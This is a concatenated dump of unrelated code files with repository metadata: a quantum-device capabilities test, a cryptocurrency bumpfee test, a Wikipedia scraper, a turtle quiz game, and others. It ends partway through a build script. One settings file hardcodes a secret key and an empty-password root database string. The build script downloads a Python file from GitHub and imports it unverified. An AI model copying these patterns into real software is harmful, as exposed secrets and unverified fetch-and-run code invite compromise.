class TestCapabilities:
"""Test that the device declares its capabilities correctly."""
def test_has_capabilities_dictionary(self, device_kwargs):
"""Test that the device class has a capabilities() method returning a dictionary."""
device_kwargs["wires"] = 1
dev = qml.device(**device_kwargs)
cap = dev.capabilities()
assert isinstance(cap, dict)
def test_model_is_defined_valid_and_correct(self, device_kwargs):
"""Test that the capabilities dictionary defines a valid model."""
device_kwargs["wires"] = 1
dev = qml.device(**device_kwargs)
cap = dev.capabilities()
assert "model" in cap
assert cap["model"] in ["qubit", "cv"]
qnode = qml.QNode(qfunc_no_input, dev)
# assert that device can measure observable from its model
qnode()
def test_passthru_interface_is_correct(self, device_kwargs):
"""Test that the capabilities dictionary defines a valid passthru interface, if not None."""
device_kwargs["wires"] = 1
dev = qml.device(**device_kwargs)
cap = dev.capabilities()
if "passthru_interface" not in cap:
pytest.skip("No passthru_interface capability specified by device.")
interface = cap["passthru_interface"]
assert interface in ["tf", "autograd", "jax"] # for new interface, add test case
qfunc = qfunc_with_scalar_input(cap["model"])
qnode = qml.qnodes.passthru.PassthruQNode(qfunc, dev)
qnode.interface = interface
# assert that we can do a simple gradient computation in the passthru interface
# without raising an error
if interface == "tf":
if TF_SUPPORT:
x = tf.Variable(0.1)
with tf.GradientTape() as tape:
res = qnode(x)
tape.gradient(res, [x])
else:
pytest.skip("Cannot import tensorflow.")
if interface == "autograd":
x = pnp.array(0.1, requires_grad=True)
g = qml.grad(qnode)
g(x)
if interface == "jax":
if JAX_SUPPORT:
x = pnp.array(0.1, requires_grad=True)
g = jax.grad(lambda a: qnode(a).reshape(()))
g(x)
else:
pytest.skip("Cannot import jax")
def test_provides_jacobian(self, device_kwargs):
"""Test that the device computes the jacobian."""
device_kwargs["wires"] = 1
dev = qml.device(**device_kwargs)
cap = dev.capabilities()
if "provides_jacobian" not in cap:
pytest.skip("No provides_jacobian capability specified by device.")
qnode = qml.QNode(qfunc_no_input, dev)
assert cap["provides_jacobian"] == hasattr(qnode, "jacobian")
def test_supports_tensor_observables(self, device_kwargs):
"""Tests that the device reports correctly whether it supports tensor observables."""
device_kwargs["wires"] = 2
dev = qml.device(**device_kwargs)
cap = dev.capabilities()
if "supports_tensor_observables" not in cap:
pytest.skip("No supports_tensor_observables capability specified by device.")
qnode = qml.QNode(qfunc_tensor_obs, dev)
if cap["supports_tensor_observables"]:
qnode()
else:
with pytest.raises(qml.QuantumFunctionError):
qnode()
def test_reversible_diff(self, device_kwargs):
"""Tests that the device reports correctly whether it supports reversible differentiation."""
device_kwargs["wires"] = 1
dev = qml.device(**device_kwargs)
cap = dev.capabilities()
if "supports_reversible_diff" not in cap:
pytest.skip("No supports_reversible_diff capability specified by device.")
if cap["supports_reversible_diff"]:
qfunc = qfunc_with_scalar_input(model=cap["model"])
qnode = qml.QNode(qfunc, dev, diff_method="reversible")
g = qml.grad(qnode)
g(0.1)
# no need to check else statement, since the reversible qnode creation fails in that case by default
def test_returns_state(self, device_kwargs):
"""Tests that the device reports correctly whether it supports reversible differentiation."""
device_kwargs["wires"] = 1
dev = qml.device(**device_kwargs)
cap = dev.capabilities()
if "returns_state" not in cap:
pytest.skip("No returns_state capability specified by device.")
qnode = qml.QNode(qfunc_no_input, dev)
qnode()
if cap["returns_state"]:
assert dev.state is not None
else:
try:
state = dev.state
except AttributeError:
state = None
assert state is None
def test_returns_probs(self, device_kwargs):
"""Tests that the device reports correctly whether it supports reversible differentiation."""
device_kwargs["wires"] = 1
dev = qml.device(**device_kwargs)
cap = dev.capabilities()
if "returns_probs" not in cap:
pytest.skip("No returns_probs capability specified by device.")
qnode = qml.QNode(qfunc_probs, dev)
if cap["returns_probs"]:
qnode()
else:
with pytest.raises(NotImplementedError):
qnode()
# TODO: Add tests for supports_finite_shots and supports_analytic_computation
# once the shots refactor is done
| [
"noreply@github.com"
] | apv-8.noreply@github.com |
4068279ea9672c4f52ddfbe0952f68fcf9605fc5 | 3a48d60ba07f240cdfd18e0165dd30a0cd294dc2 | /project/Setting.py | b4e9ea9e906c7b62745847f3f59865dbc328e698 | [] | no_license | aminubi/jobpool | 1184a63d0843b3dac6c1e256f45466029ad46404 | 027d81927227a40dacc1352cfe4e51d5633ebea5 | refs/heads/main | 2023-05-07T16:39:26.175879 | 2021-05-29T00:05:32 | 2021-05-29T00:05:32 | 362,092,772 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 119 | py | DB_SQLITE ='sqlite:///dbjobpool.sqlite'
DB_MYSQL ='mysql://root:''@localhost/dbjobpool'
KEY = 'Thisismysecretkey@@@@&&' | [
"aminu21@gmail.com"
] | aminu21@gmail.com |
79f7f3f9cb4fe14bc387ba58a753639478bd0990 | 2e56e031a809b10f7c60dca72de91ca208b4c3e1 | /test/functional/bumpfee.py | def7a94eefedff75a9d6c26dd190b6328e83e44e | [
"MIT"
] | permissive | dakecoin/dakecoin | c1cd56e73a63f406e333b7a74375a2c86805e5a8 | 8b9710a809c0ec2951fedb63f6e57f2a64bd5a34 | refs/heads/master | 2020-03-22T03:47:03.955283 | 2018-07-03T01:12:58 | 2018-07-03T01:12:58 | 139,452,155 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,500 | py | #!/usr/bin/env python3
# Copyright (c) 2016-2017 The DakeCoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the bumpfee RPC.
Verifies that the bumpfee RPC creates replacement transactions successfully when
its preconditions are met, and returns appropriate errors in other cases.
This module consists of around a dozen individual test cases implemented in the
top-level functions named as test_<test_case_description>. The test functions
can be disabled or reordered if needed for debugging. If new test cases are
added in the future, they should try to follow the same convention and not
make assumptions about execution order.
"""
from segwit import send_to_witness
from test_framework.test_framework import DakeCoinTestFramework
from test_framework import blocktools
from test_framework.mininode import CTransaction
from test_framework.util import *
import io
# Sequence number that is BIP 125 opt-in and BIP 68-compliant
BIP125_SEQUENCE_NUMBER = 0xfffffffd
WALLET_PASSPHRASE = "test"
WALLET_PASSPHRASE_TIMEOUT = 3600
class BumpFeeTest(DakeCoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
self.extra_args = [["-prematurewitness", "-walletprematurewitness", "-walletrbf={}".format(i)]
for i in range(self.num_nodes)]
def run_test(self):
# Encrypt wallet for test_locked_wallet_fails test
self.nodes[1].node_encrypt_wallet(WALLET_PASSPHRASE)
self.start_node(1)
self.nodes[1].walletpassphrase(WALLET_PASSPHRASE, WALLET_PASSPHRASE_TIMEOUT)
connect_nodes_bi(self.nodes, 0, 1)
self.sync_all()
peer_node, rbf_node = self.nodes
rbf_node_address = rbf_node.getnewaddress()
# fund rbf node with 10 coins of 0.001 btc (100,000 satoshis)
self.log.info("Mining blocks...")
peer_node.generate(110)
self.sync_all()
for i in range(25):
peer_node.sendtoaddress(rbf_node_address, 0.001)
self.sync_all()
peer_node.generate(1)
self.sync_all()
assert_equal(rbf_node.getbalance(), Decimal("0.025"))
self.log.info("Running tests")
dest_address = peer_node.getnewaddress()
test_simple_bumpfee_succeeds(rbf_node, peer_node, dest_address)
test_segwit_bumpfee_succeeds(rbf_node, dest_address)
test_nonrbf_bumpfee_fails(peer_node, dest_address)
test_notmine_bumpfee_fails(rbf_node, peer_node, dest_address)
test_bumpfee_with_descendant_fails(rbf_node, rbf_node_address, dest_address)
test_small_output_fails(rbf_node, dest_address)
test_dust_to_fee(rbf_node, dest_address)
test_settxfee(rbf_node, dest_address)
test_rebumping(rbf_node, dest_address)
test_rebumping_not_replaceable(rbf_node, dest_address)
test_unconfirmed_not_spendable(rbf_node, rbf_node_address)
test_bumpfee_metadata(rbf_node, dest_address)
test_locked_wallet_fails(rbf_node, dest_address)
self.log.info("Success")
def test_simple_bumpfee_succeeds(rbf_node, peer_node, dest_address):
rbfid = spend_one_input(rbf_node, dest_address)
rbftx = rbf_node.gettransaction(rbfid)
sync_mempools((rbf_node, peer_node))
assert rbfid in rbf_node.getrawmempool() and rbfid in peer_node.getrawmempool()
bumped_tx = rbf_node.bumpfee(rbfid)
assert_equal(bumped_tx["errors"], [])
assert bumped_tx["fee"] - abs(rbftx["fee"]) > 0
# check that bumped_tx propagates, original tx was evicted and has a wallet conflict
sync_mempools((rbf_node, peer_node))
assert bumped_tx["txid"] in rbf_node.getrawmempool()
assert bumped_tx["txid"] in peer_node.getrawmempool()
assert rbfid not in rbf_node.getrawmempool()
assert rbfid not in peer_node.getrawmempool()
oldwtx = rbf_node.gettransaction(rbfid)
assert len(oldwtx["walletconflicts"]) > 0
# check wallet transaction replaces and replaced_by values
bumpedwtx = rbf_node.gettransaction(bumped_tx["txid"])
assert_equal(oldwtx["replaced_by_txid"], bumped_tx["txid"])
assert_equal(bumpedwtx["replaces_txid"], rbfid)
def test_segwit_bumpfee_succeeds(rbf_node, dest_address):
# Create a transaction with segwit output, then create an RBF transaction
# which spends it, and make sure bumpfee can be called on it.
segwit_in = next(u for u in rbf_node.listunspent() if u["amount"] == Decimal("0.001"))
segwit_out = rbf_node.validateaddress(rbf_node.getnewaddress())
rbf_node.addwitnessaddress(segwit_out["address"])
segwitid = send_to_witness(
use_p2wsh=False,
node=rbf_node,
utxo=segwit_in,
pubkey=segwit_out["pubkey"],
encode_p2sh=False,
amount=Decimal("0.0009"),
sign=True)
rbfraw = rbf_node.createrawtransaction([{
'txid': segwitid,
'vout': 0,
"sequence": BIP125_SEQUENCE_NUMBER
}], {dest_address: Decimal("0.0005"),
rbf_node.getrawchangeaddress(): Decimal("0.0003")})
rbfsigned = rbf_node.signrawtransaction(rbfraw)
rbfid = rbf_node.sendrawtransaction(rbfsigned["hex"])
assert rbfid in rbf_node.getrawmempool()
bumped_tx = rbf_node.bumpfee(rbfid)
assert bumped_tx["txid"] in rbf_node.getrawmempool()
assert rbfid not in rbf_node.getrawmempool()
def test_nonrbf_bumpfee_fails(peer_node, dest_address):
# cannot replace a non RBF transaction (from node which did not enable RBF)
not_rbfid = peer_node.sendtoaddress(dest_address, Decimal("0.00090000"))
assert_raises_rpc_error(-4, "not BIP 125 replaceable", peer_node.bumpfee, not_rbfid)
def test_notmine_bumpfee_fails(rbf_node, peer_node, dest_address):
# cannot bump fee unless the tx has only inputs that we own.
# here, the rbftx has a peer_node coin and then adds a rbf_node input
# Note that this test depends upon the RPC code checking input ownership prior to change outputs
# (since it can't use fundrawtransaction, it lacks a proper change output)
utxos = [node.listunspent()[-1] for node in (rbf_node, peer_node)]
inputs = [{
"txid": utxo["txid"],
"vout": utxo["vout"],
"address": utxo["address"],
"sequence": BIP125_SEQUENCE_NUMBER
} for utxo in utxos]
output_val = sum(utxo["amount"] for utxo in utxos) - Decimal("0.001")
rawtx = rbf_node.createrawtransaction(inputs, {dest_address: output_val})
signedtx = rbf_node.signrawtransaction(rawtx)
signedtx = peer_node.signrawtransaction(signedtx["hex"])
rbfid = rbf_node.sendrawtransaction(signedtx["hex"])
assert_raises_rpc_error(-4, "Transaction contains inputs that don't belong to this wallet",
rbf_node.bumpfee, rbfid)
def test_bumpfee_with_descendant_fails(rbf_node, rbf_node_address, dest_address):
# cannot bump fee if the transaction has a descendant
# parent is send-to-self, so we don't have to check which output is change when creating the child tx
parent_id = spend_one_input(rbf_node, rbf_node_address)
tx = rbf_node.createrawtransaction([{"txid": parent_id, "vout": 0}], {dest_address: 0.00020000})
tx = rbf_node.signrawtransaction(tx)
rbf_node.sendrawtransaction(tx["hex"])
assert_raises_rpc_error(-8, "Transaction has descendants in the wallet", rbf_node.bumpfee, parent_id)
def test_small_output_fails(rbf_node, dest_address):
# cannot bump fee with a too-small output
rbfid = spend_one_input(rbf_node, dest_address)
rbf_node.bumpfee(rbfid, {"totalFee": 50000})
rbfid = spend_one_input(rbf_node, dest_address)
assert_raises_rpc_error(-4, "Change output is too small", rbf_node.bumpfee, rbfid, {"totalFee": 50001})
def test_dust_to_fee(rbf_node, dest_address):
# check that if output is reduced to dust, it will be converted to fee
# the bumped tx sets fee=49,900, but it converts to 50,000
rbfid = spend_one_input(rbf_node, dest_address)
fulltx = rbf_node.getrawtransaction(rbfid, 1)
bumped_tx = rbf_node.bumpfee(rbfid, {"totalFee": 49900})
full_bumped_tx = rbf_node.getrawtransaction(bumped_tx["txid"], 1)
assert_equal(bumped_tx["fee"], Decimal("0.00050000"))
assert_equal(len(fulltx["vout"]), 2)
assert_equal(len(full_bumped_tx["vout"]), 1) #change output is eliminated
def test_settxfee(rbf_node, dest_address):
# check that bumpfee reacts correctly to the use of settxfee (paytxfee)
rbfid = spend_one_input(rbf_node, dest_address)
requested_feerate = Decimal("0.00025000")
rbf_node.settxfee(requested_feerate)
bumped_tx = rbf_node.bumpfee(rbfid)
actual_feerate = bumped_tx["fee"] * 1000 / rbf_node.getrawtransaction(bumped_tx["txid"], True)["vsize"]
# Assert that the difference between the requested feerate and the actual
# feerate of the bumped transaction is small.
assert_greater_than(Decimal("0.00001000"), abs(requested_feerate - actual_feerate))
rbf_node.settxfee(Decimal("0.00000000")) # unset paytxfee
def test_rebumping(rbf_node, dest_address):
# check that re-bumping the original tx fails, but bumping the bumper succeeds
rbfid = spend_one_input(rbf_node, dest_address)
bumped = rbf_node.bumpfee(rbfid, {"totalFee": 2000})
assert_raises_rpc_error(-4, "already bumped", rbf_node.bumpfee, rbfid, {"totalFee": 3000})
rbf_node.bumpfee(bumped["txid"], {"totalFee": 3000})
def test_rebumping_not_replaceable(rbf_node, dest_address):
# check that re-bumping a non-replaceable bump tx fails
rbfid = spend_one_input(rbf_node, dest_address)
bumped = rbf_node.bumpfee(rbfid, {"totalFee": 10000, "replaceable": False})
assert_raises_rpc_error(-4, "Transaction is not BIP 125 replaceable", rbf_node.bumpfee, bumped["txid"],
{"totalFee": 20000})
def test_unconfirmed_not_spendable(rbf_node, rbf_node_address):
# check that unconfirmed outputs from bumped transactions are not spendable
rbfid = spend_one_input(rbf_node, rbf_node_address)
rbftx = rbf_node.gettransaction(rbfid)["hex"]
assert rbfid in rbf_node.getrawmempool()
bumpid = rbf_node.bumpfee(rbfid)["txid"]
assert bumpid in rbf_node.getrawmempool()
assert rbfid not in rbf_node.getrawmempool()
# check that outputs from the bump transaction are not spendable
# due to the replaces_txid check in CWallet::AvailableCoins
assert_equal([t for t in rbf_node.listunspent(minconf=0, include_unsafe=False) if t["txid"] == bumpid], [])
# submit a block with the rbf tx to clear the bump tx out of the mempool,
# then call abandon to make sure the wallet doesn't attempt to resubmit the
# bump tx, then invalidate the block so the rbf tx will be put back in the
# mempool. this makes it possible to check whether the rbf tx outputs are
# spendable before the rbf tx is confirmed.
block = submit_block_with_tx(rbf_node, rbftx)
rbf_node.abandontransaction(bumpid)
rbf_node.invalidateblock(block.hash)
assert bumpid not in rbf_node.getrawmempool()
assert rbfid in rbf_node.getrawmempool()
# check that outputs from the rbf tx are not spendable before the
# transaction is confirmed, due to the replaced_by_txid check in
# CWallet::AvailableCoins
assert_equal([t for t in rbf_node.listunspent(minconf=0, include_unsafe=False) if t["txid"] == rbfid], [])
# check that the main output from the rbf tx is spendable after confirmed
rbf_node.generate(1)
assert_equal(
sum(1 for t in rbf_node.listunspent(minconf=0, include_unsafe=False)
if t["txid"] == rbfid and t["address"] == rbf_node_address and t["spendable"]), 1)
def test_bumpfee_metadata(rbf_node, dest_address):
rbfid = rbf_node.sendtoaddress(dest_address, Decimal("0.00100000"), "comment value", "to value")
bumped_tx = rbf_node.bumpfee(rbfid)
bumped_wtx = rbf_node.gettransaction(bumped_tx["txid"])
assert_equal(bumped_wtx["comment"], "comment value")
assert_equal(bumped_wtx["to"], "to value")
def test_locked_wallet_fails(rbf_node, dest_address):
rbfid = spend_one_input(rbf_node, dest_address)
rbf_node.walletlock()
assert_raises_rpc_error(-13, "Please enter the wallet passphrase with walletpassphrase first.",
rbf_node.bumpfee, rbfid)
def spend_one_input(node, dest_address):
tx_input = dict(
sequence=BIP125_SEQUENCE_NUMBER, **next(u for u in node.listunspent() if u["amount"] == Decimal("0.00100000")))
rawtx = node.createrawtransaction(
[tx_input], {dest_address: Decimal("0.00050000"),
node.getrawchangeaddress(): Decimal("0.00049000")})
signedtx = node.signrawtransaction(rawtx)
txid = node.sendrawtransaction(signedtx["hex"])
return txid
def submit_block_with_tx(node, tx):
ctx = CTransaction()
ctx.deserialize(io.BytesIO(hex_str_to_bytes(tx)))
tip = node.getbestblockhash()
height = node.getblockcount() + 1
block_time = node.getblockheader(tip)["mediantime"] + 1
block = blocktools.create_block(int(tip, 16), blocktools.create_coinbase(height), block_time)
block.vtx.append(ctx)
block.rehash()
block.hashMerkleRoot = block.calc_merkle_root()
blocktools.add_witness_commitment(block)
block.solve()
node.submitblock(bytes_to_hex_str(block.serialize(True)))
return block
if __name__ == "__main__":
BumpFeeTest().main()
| [
"dakecoin@gmail.com"
] | dakecoin@gmail.com |
8f37f2e453b8bc1294b0dbd34d9f873b54ec3013 | 80ca8c0f696a99e5f44fae4a8d423f041bbd81ff | /12Lesson(assignment)/app/search_engine.py | e89e50fa795c30849afddd16a9dcdbe5cc128852 | [] | no_license | C0nstanta/one | ce856f8f176894adc8270fa2f0e7d1c4fc1ddfaf | 7699dd0f9127e6775b36670d95cd7bbbc1adedbc | refs/heads/master | 2022-12-11T20:55:15.325716 | 2020-07-04T23:18:56 | 2020-07-04T23:18:56 | 214,294,255 | 0 | 0 | null | 2022-12-08T10:49:59 | 2019-10-10T22:08:06 | HTML | UTF-8 | Python | false | false | 3,430 | py | import requests
import os
from bs4 import BeautifulSoup
class SearchWiki:
filepath = os.getcwd()
headers = {
'content-type': 'text',
'Connection': 'keep-alive',
'Search-Version': 'v3',
'Accept': 'application/json',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/81.0.4044.129 Safari/537.36',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9',
}
def wiki_search(self, wiki_request):
self.wiki_request = wiki_request
print("Hello")
self.res = requests.get(f"https://en.wikipedia.org/wiki/Special:Search?search={self.wiki_request}&go=Go"
f"&ns0=1", headers=self.headers, allow_redirects=True).text
with open(self.filepath+f"/app/testhtml/{self.wiki_request}.html", "w+", encoding='utf-8') as file:
file.write(self.res)
intro = self.pattern_method(self.res)
return intro
def pattern_method(self, res):
try:
test1 = BeautifulSoup(res, 'html.parser').find('div', attrs={'id': 'bodyContent'})
# Этот блок for in : мне не нравится очень сильно, но я не знаю как его красивее сделать.
# Разве что засунуть это все в список-словарь и брать оттуда запросы. Но по сути - это те же яйца, только в
# профиль.
# Тут происходит постепенная обрезка html страницы до приемлимого (+-) нам формата.
# "Обрезание" должно быть последовательным... (Выслушаю с удовольствие критики и руководство, как сделать
# "красивше")
for excl_content in test1.find_all('table', attrs={'id': 'disambigbox'}):
excl_content.extract()
for excl_content in test1.find_all('div', attrs={'class': 'printfooter'}):
excl_content.extract()
for excl_content in test1.find_all('div', attrs={'class': 'mw-normal-catlinks'}):
excl_content.extract()
for excl_content in test1.find_all('div', attrs={'class', 'catlinks'}):
excl_content.extract()
for excl_content in test1.find_all('noscript'):
excl_content.extract()
for excl_content in test1.find_all('a', attrs={'class': 'mw-jump-link'}):
excl_content.extract()
del_empty_lines = [line for line in test1.get_text().splitlines() if line != '']
print(del_empty_lines)
with open(self.filepath + f"/app/testhtml/{self.wiki_request}-test.html", "w", encoding='utf-8') as file:
file.write(str(test1))
sum_line = ""
with open(self.filepath + f"/app/testhtml/{self.wiki_request}-test-text.html", "w", encoding='utf-8') as \
file:
for line in del_empty_lines:
sum_line += line+'\n'
file.write(str(line + '\n'))
return sum_line
except Exception as e:
print(e)
return "\nNothing found, specify the request"
| [
"inter.nafta32@gmail.com"
] | inter.nafta32@gmail.com |
c91fda8d7e718be057f365e3e68e11e3bb91229a | 35237eeeeda22cd65f895af675effb93ec6afe84 | /add_one.py | 02502e2033a7e95d12fe5f81f95e2d348badd5c7 | [] | no_license | saisunil702/pythonking | 7b548ccdeec66e83e13e3c4fe364834670a69676 | 0067d5af23281c0d94352421845144eec52aa4d0 | refs/heads/master | 2020-03-24T06:53:23.588716 | 2018-08-20T10:23:41 | 2018-08-20T10:23:41 | 142,545,491 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 30 | py | nom=int(input())
print(nom+1)
| [
"noreply@github.com"
] | saisunil702.noreply@github.com |
ef0f0814fa7c0a22523922f91021507554956c39 | 3ae545d444a0073b8c61b2bfae9854a58f2e0474 | /python/juego.py | bcd6c34f9ea63c7155a6738ae39277bc105384ab | [] | no_license | ExePtion31/Phyton | 9d1ad260977d6f9b4d14c44283cc827f372ff967 | 8a6af97a3d84c281a08dea14c8feec383594ca3c | refs/heads/main | 2022-12-25T07:07:23.282274 | 2020-10-07T21:03:13 | 2020-10-07T21:03:13 | 294,249,458 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,775 | py | # -*- coding: utf-8 -*-
from turtle import *
import random;
import time;
import threading;
from concurrent.futures import ThreadPoolExecutor;
screen = Screen()
tortuga = Turtle();
timeremaining = Turtle();
losesignal = Turtle();
winsignal = Turtle();
preguntas = [
"Resolver la siguiente integral:\n ∫tanx dx\n\nRespuetas:\nA.-ln senx + C\nB.-ln cosx + C\nC.ln cosx + C\nD.-ln tanx - C",
"Resolver la siguiente derivada f(x) = 2x^4 + x^3 - x^2 + 4\n\nRespuetas:\nA.f(x) = 8x^3 + 3x^2 - 2x\nB.f(x) = 8x^2 + 4x^2 - x\nC.f(x) = 8x^3 - 3x^2 - 2x\nD.f(x) = 5x^3 - 3x^2 + 2x",
"¿A qué velocidad debe circular un auto de carreras para recorrer 50km en un cuarto de hora?\n\nRespuestas:\nA.150km/h\nB.180km/h\nC.200km/h\nD.300km/h",
"Se deja caer un objeto desde la azotea de un edificio que tiene una altura de 12m. ¿En que tiempo toca el piso?\n\nRespuestas:\nA.1,23s\nB.1,90s\nC.2,00s\nD.1,57s",
"Un jugador de Fútbol Americano patea el balón con una velocidad de 30 m/s, y éste mismo lleva un ángulo de elevación de 48° respecto a la horizontal. Calcule el tiempo que permanece en el aire.\n\nRespuestas:\nA.3,57s\nB.4,55s\nC.6,78s\nD.5,67s"
]
respuestas = ["b","a","c","d","b"];
#--------funcion main--------
def main():
create_screen();
#---------------------------
#------create screen--------
def create_screen():
screen.title("Juego funciones matematicas")
create_turtle();
screen.mainloop();
#---------------------------
#------create turtle--------
def create_turtle():
tortuga.shape("turtle");
tortuga.color("green");
tortuga.penup();
time_signal();
#---------------------------
#------time remaining-------
def time_signal():
timeremaining.speed(0);
timeremaining.penup();
timeremaining.hideturtle();
positioning();
#---------------------------
#---------positioning-------
def positioning():
winsignal.clear();
losesignal.clear();
winsignal.hideturtle();
losesignal.hideturtle();
tortuga.goto(random.randint(-230, 230), random.randint(-230, 230));
timeremaining.goto(-200, 240);
timeremaining.write("Tiempo: 0:00", align="center", font=("Courier", 24, "normal"));
instructions();
#---------------------------
#-------instructions-------
def instructions():
instrucciones = screen.textinput("Instrucciones:","Las instrucciones para el juego son las siguientes:\n1.Debe responder correctamente el problema matematico para poder hacer un movimiento\n2.Si responde mal el problema, el juego finalizara\n\n¿Entendio las instrucciones?\n1.Si\n2.No");
if instrucciones == "1":
game_start();
elif instrucciones == "si":
executor = ThreadPoolExecutor(max_workers=1);
executor.submit(time_remaining);
else:
exit();
#--------------------------
#------game start----------
def game_start():
contador = 0;
while True:
pregunta = screen.textinput("Pregunta",preguntas[contador]);
if pregunta == respuestas[contador]:
contador = contador + 1;
move_turtle();
else:
lose_signal();
#-------------------------
#-------move turtle----------
def move_turtle():
screen.onkeypress(forward_turtle,"Up");
screen.onkeypress(backward_turtle,"Down");
screen.onkeypress(left_turtle,"Left");
screen.onkeypress(right_turtle,"Right");
screen.listen();
#----------------------------
#-----forward turtle---------
def forward_turtle():
tortuga.forward(10);
#----------------------------
#-----backward turtle--------
def backward_turtle():
tortuga.backward(10);
#----------------------------
#--------left turtle---------
def left_turtle():
tortuga.left(10);
#----------------------------
#-------right turtle---------
def right_turtle():
tortuga.right(10);
#----------------------------
#-----------winner/lose signal----------
def win_signal():
winsignal.speed(0);
winsignal.shape("square");
winsignal.color("black");
winsignal.penup();
winsignal.hideturtle() #volver la tortuga invisible.
winsignal.write("¡WINNER!", align="center", font=("Courier", 30, "normal"))
restart_game();
def lose_signal():
losesignal.speed(0);
losesignal.shape("square");
losesignal.color("black");
losesignal.penup();
losesignal.hideturtle() #volver la tortuga invisible.
losesignal.write("¡LOSER!", align="center", font=("Courier", 30, "normal"))
restart_game();
#-------------------------------------
#--------------restart game----------------------------
def restart_game():
respuesta = screen.textinput("Desea reiniciar:", "¿Desea reiniciar el juego?:\n1.Si\n2.No");
if respuesta == "no":
exit();
elif respuesta == "No":
exit();
elif respuesta == "NO":
exit();
elif respuesta == "nO":
exit();
elif respuesta == "2":
exit();
elif respuesta == "1":
positioning();
elif respuesta == "si":
positioning();
elif respuesta == "Si":
positioning();
elif respuesta == "sI":
positioning();
elif respuesta == "SI":
positioning();
#------------------------------------
#------------reloj----------------
def time_remaining():
for m in range(0,60):
for s in range(0,60):
timeremaining.clear();
timeremaining.write("Tiempo: {} : {}".format(m,s), align="center", font=("Courier", 24, "normal"));
time.sleep(1);
if m==1 and s==0:
lose_signal();
#--------------------------------
#-------main-------------
if __name__ == "__main__":
main();
#------------------------ | [
"giovanni.baquero@uniagustiniana.edu.co"
] | giovanni.baquero@uniagustiniana.edu.co |
0b87298b937fe6f4f9ca7be7d7d98654015a6759 | 9e1e8562db2a32e7ee271e32ee198dcbdc83f6e2 | /utils/ErrorUtils.py | d4fdbcfa7af0b8c92c1dff924c0202a9e7acbb91 | [] | no_license | SpasZahariev/nqme-flask | e5ac66847867fa0239d4183d9dd9ada7a95d4115 | a2fb27bb0cef5d1ec8f36179e87aca76c3c62767 | refs/heads/master | 2023-08-07T14:39:12.260817 | 2022-02-01T19:19:23 | 2022-02-01T19:19:23 | 188,726,256 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 705 | py | from enum import Enum
class ErrorMsg(Enum):
NO_HEAD = 'No head is provided'
NO_QUEUE = 'Queue does not exist'
NO_SONG = 'Song does not exist'
DEQ_FAIL = 'Song was not dequeued'
NO_MASTER = 'Access denied! User is not a master'
NO_USER = 'Access denied! User does not belong to this room'
NOT_REMOVED = 'Song was not removed! It either does not exist or an error has occurred!'
NO_VOTE = 'User has not voted for this song'
VOTE_NOT_REMOVED = 'Vote was not removed! Please try again!'
ERROR = 'An error has occurred! Please try again'
HEAD_MISMATCH = 'Head does not correspond to state of queue'
NO_AUTH = 'No authorization header is attached to the request' | [
"spaszahariev54@gmail.com"
] | spaszahariev54@gmail.com |
a4c0b4b317e3a3e61c1ea5f0d671a3fc136659f7 | af71ad6f9509b119dbaf86e661b372b073e07338 | /bild.py | adb9c3df317d0922e6d01a40842477f0677665d1 | [] | no_license | JoyLink/vtable | 4f01d5dc0bc0c9fc1ac7e5a826801168881f38c0 | 6b08045f9058e14242abf569ae86986464592b7d | refs/heads/master | 2020-12-24T18:51:05.558744 | 2016-04-26T23:55:32 | 2016-04-26T23:55:32 | 57,169,825 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,212 | py | #!/usr/bin/env python
# bootstrap by downloading bilder.py if not found
import urllib
import os
import glob
# ASSUMES YOU HAVE GNU indent installed. ($ brew install gnu-indent on mac os x)
# Executable is gindent
# http://www.gnu.org/software/indent/manual/
if not os.path.exists("bilder.py"):
print "bootstrapping; downloading bilder.py"
urllib.urlretrieve(
"https://raw.githubusercontent.com/parrt/bild/master/src/python/bilder.py",
"bilder.py")
# assumes bilder.py is in current directory
from bilder import *
def parser():
antlr4(srcdir="src/cs652/j/parser", trgdir="gen",
package="cs652.j.parser",
version="4.5",
args=["-visitor"])
def compile():
require(parser)
download("http://www.antlr.org/download/antlr-4.5-complete.jar", JARCACHE)
download("http://www.antlr.org/download/symtab-1.0.jar", JARCACHE)
javac("src", "out", javacVersion="1.8", cp="src:gen:out:resources:"+JARCACHE+"/antlr-4.5-complete.jar:"+JARCACHE+"/symtab-1.0.jar")
def mkjar():
require(compile)
mkdir("dist")
jarfile = "dist/jtran.jar"
manifest = \
"Main-Class: cs652.j.JTran\n" +\
"Implementation-Title: JTran Java to C translator\n" +\
"Implementation-Vendor-Id: org.antlr\n" +\
"Built-By: %s\n" +\
"Build-Jdk: 1.8\n" +\
"Created-By: http://www.bildtool.org\n" +\
"\n"
manifest = manifest % os.getlogin()
unjar(os.path.join(JARCACHE, "antlr-4.5-complete.jar"), trgdir="out")
unjar(os.path.join(JARCACHE, "symtab-1.0.jar"), trgdir="out")
copyfile("resources/cs652/j/templates/C.stg", "out/cs652/j/templates/C.stg")
jar(jarfile, srcdir="out", manifest=manifest)
print_and_log("Generated " + jarfile)
def test(jfile):
log("TEST "+jfile)
print("TEST "+jfile)
dir = os.path.dirname(jfile)
base = os.path.basename(jfile)
base = os.path.splitext(base)[0]
cfile = base+".c"
expected_cfile = dir+"/"+cfile
expected_output = dir+"/"+base+".txt"
java(classname="cs652.j.JTran", cp="out:resources:"+JARCACHE+"/antlr-4.5-complete.jar:"+JARCACHE+"/symtab-1.0.jar",
progargs=["-o", "/tmp/"+cfile, jfile])
executable = "/tmp/" + base
CC = ["gcc", "-o", executable, "/tmp/"+cfile]
exec_and_log(CC)
log(executable+" &> /tmp/"+base+".txt")
os.system(executable+" &> /tmp/"+base+".txt")
# normalize the file
indent_args = ["-bap", "-bad", "-br", "-nce", "-ncs", "-nprs", "-npcs", "-sai", "-saw",
"-di1", "-brs", "-blf", "--indent-level4", "-nut", "-sob", "-l200"]
